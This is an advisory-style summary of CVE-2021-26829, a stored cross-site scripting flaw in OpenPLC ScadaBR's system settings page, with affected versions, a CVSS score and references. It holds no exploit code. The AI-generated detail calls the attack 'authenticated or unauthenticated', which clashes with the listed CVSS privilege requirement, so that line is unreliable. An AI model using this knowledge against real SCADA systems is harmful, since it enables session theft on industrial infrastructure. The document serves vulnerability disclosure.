CVE-2021-26829
CVE-2021-26829
In short
OpenPLC ScadaBR has a stored cross-site scripting (XSS) vulnerability in its system settings page. An attacker can inject malicious scripts that get saved and executed when other users view the settings, potentially stealing their credentials or session data.
Technical detail
Stored XSS vulnerability in system_settings.shtm allows authenticated or unauthenticated attackers to inject arbitrary JavaScript that persists in the application database. When administrators or other users access the affected page, the malicious script executes in their browser context, enabling session hijacking, credential theft, or further compromise of the SCADA system.
Summary generated and translated by AI from the official description.
OpenPLC ScadaBR through 0.9.1 on Linux and through 1.12.4 on Windows allows stored XSS via system_settings.shtm.
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
Affected products
n/a · n/aWant to know if your infrastructure is exposed to this?
Talk to TrueHacking →References
http://forum.scadabr.com.br/t/report-falhas-de-seguranca-em-versoes-do-scadabr/3615/4https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2021-26829https://www.forescout.com/blog/anatomy-of-a-hacktivist-attack-russian-aligned-group-targets-otics/https://youtu.be/Xh6LPCiLMa8